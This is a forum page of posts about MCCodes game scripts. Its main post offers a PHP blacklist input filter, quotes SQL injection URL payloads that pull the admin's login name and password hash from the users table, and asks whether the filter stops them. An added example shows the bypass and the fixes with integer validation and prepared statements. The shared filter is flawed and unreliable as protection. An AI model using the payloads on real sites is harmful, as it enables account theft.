MakeWebGames

Everything posted by KyawLinNyein

  1. Some people here will say this doesn't work and some will actually try it out and may even like to use it. It's all up to you and whoever decides to give it a shot.

     1.) Take the below code and paste it into a .php file called whatever you want. Here I will use thefile.php.

         <?php
         // Removes every character the pattern matches from $string.
         // Each [...] is a character class, so ([uNION]) matches the single
         // letters u, n, i, o (any case), not the word.
         function replace_meta_chars($string)
         {
             return @eregi_replace("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])|([uNION])|([sELECT])|([DROP])|([WHERE])|([EMPTY])|([FLUSH])|([iNSERT])","",$string);
         }

         // First pass: stop the page if any request value contains a listed character.
         while(list($keyx,$valuex) = each($_REQUEST))
         {
             if(eregi("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])",$valuex))
             {
                 print " Attack Attempt !!! WARNING !!! Malicious Code Detected! The staff has been notified. Currently, we only allow the characters of ' / ' and ' ? '. << Explore";
                 event_add(1,"{$ir['username']} has been flagged for malicious code. Char Details Chars Used: $valuex",$c);
                 $h->endpage();
                 exit();
             }
         }
         reset ($_REQUEST);
         // Second pass: copy each filtered value into a variable named after its key.
         // $_REQUEST itself is left unchanged.
         while(list($keyx,$valuex) = each($_REQUEST))
         {
             ${$keyx} = replace_meta_chars($valuex);
         }
         ?>

     2.) Place the following on the very top of whatever page you plan to use it on.

         require "thefile.php";

     EXAMPLE:

         <?php
         $atkpage=1;
         include "globals.php";
         require "thefile.php";
         print "YOUR PAGE CONTENT";
         $h->endpage();
         ?>

     If you plan to use it on all pages, then place it in either your globals or header file. I don't remember where I saw this code, but it is free to use and a lot of games are using it right now, as some of you may have seen already trying to hack. To allow/disallow characters, just remove or add them from the above script. Example below of what to look for.

         return @eregi_replace("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])|([uNION])|([sELECT])|([DROP])|([WHERE])|([EMPTY])|([FLUSH])|([iNSERT])","",$string);

         if(eregi("([<])|([>])|([*])|([|])|([;])|([`])|([-])|([\])|([{])|([}])|([+])",$valuex))

     For a little more added protection, stick the following in your globals.php file.

         function anti_inject($campo)
         {
             foreach($campo as $key => $val)
             {
                 $val = mysql_real_escape_string($val);
                 // store it back into the array
                 $campo[$key] = $val;
             }
             return $campo; // Returns the cleaned array
         }
         // the next two lines make sure all post and get vars are filtered through this function
         $_POST = anti_inject($_POST);
         $_GET = anti_inject($_GET);

     Enjoy!

     I saw the Hack UID=1's passcode with decoder, they show as follows:

     this is the login name of id [1]

     Code:

         ?reply=0+union+all+select+login_name,login_name,login_name,login_name,lo ? gin_name,login_name,login_name,login_name,login_name,login_name,logi ?n_name,login_name,login_name+from+users+where+userid=1

     ******************

     this is the password of [1] but will give you a long code

     Code:

         ?reply=0+union+all+select+userpass,userpass,userpass,userpass,userpass%2 ? Cuserpass,userpass,userpass,userpass,userpass,userpass,userpass,us ?erpass+from+users+where+userid=1

     **************

     And the pass cracker needs to go to " http://www.md5decrypter.com " to decrypt the passcode. I want to know, can that code you wrote to add to global.php prevent that kind of injection? Thanks,
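On the question that closes this post, an added example (not part of the original post or of the game's code) showing how the character check and mysql_real_escape_string() treat a value of the quoted form when it lands in an unquoted numeric position, next to two fixes. The in-memory SQLite database, the replies table, the rows and the helpers escape_like_mysql() and blacklist_hit() are assumptions constructed for the demonstration.

```php
<?php
// Added example: schema, rows and helper names are constructed for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (userid INTEGER, login_name TEXT, userpass TEXT)");
$db->exec("CREATE TABLE replies (id INTEGER, body TEXT)");
$db->exec("INSERT INTO users VALUES (1, 'admin', 'constructed-md5-hash')");
$db->exec("INSERT INTO replies VALUES (7, 'hello')");

// Hypothetical stand-in for mysql_real_escape_string() (removed in PHP 7):
// it backslash-escapes the same bytes that function escapes.
function escape_like_mysql(string $v): string
{
    return strtr($v, ["\\" => "\\\\", "\x00" => "\\0", "\n" => "\\n", "\r" => "\\r",
                      "'" => "\\'", '"' => '\\"', "\x1a" => "\\Z"]);
}

// preg_match() form of the character list in the post's eregi() check.
function blacklist_hit(string $v): bool
{
    return preg_match('/[<>*|;`\-\\\\{}+]/', $v) === 1;
}

// Request value in the form quoted in the post, after URL decoding ('+' arrives
// as a space), shortened to two columns to match the constructed replies table.
$reply = "0 union all select userpass,userpass from users where userid=1";

// Neither layer reacts: the value has no listed character and nothing to escape.
echo "blacklist hit: ", var_export(blacklist_hit($reply), true), "\n";
$escaped = escape_like_mysql($reply);
echo "changed by escaping: ", var_export($escaped !== $reply, true), "\n";

// Vulnerable pattern: the escaped value sits in an unquoted numeric position,
// so the database parses the rest of it as SQL.
$rows = $db->query("SELECT id, body FROM replies WHERE id = $escaped")->fetchAll(PDO::FETCH_NUM);
echo "concatenated query rows: ", json_encode($rows), "\n";

// Fix 1: validate the type the query expects; non-integers are rejected.
$id = filter_var($reply, FILTER_VALIDATE_INT);
echo "accepted as integer: ", var_export($id !== false, true), "\n";

// Fix 2: bind the value; it is compared as data and never parsed as SQL.
$stmt = $db->prepare("SELECT id, body FROM replies WHERE id = ?");
$stmt->execute([$reply]);
echo "bound query rows: ", json_encode($stmt->fetchAll(PDO::FETCH_NUM)), "\n";
```

Running it requires the pdo_sqlite extension; with MySQL the same two fixes apply through mysqli or PDO prepared statements.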
  2. Crime error: Database syntax error I got first. Then I got the error of so many Level improving because I don't know the formula.
  3. I'm a starter user for mccodes v 2.*. I don't know how to add a crime, and I saw a database error when I add every kind of crime. Help me.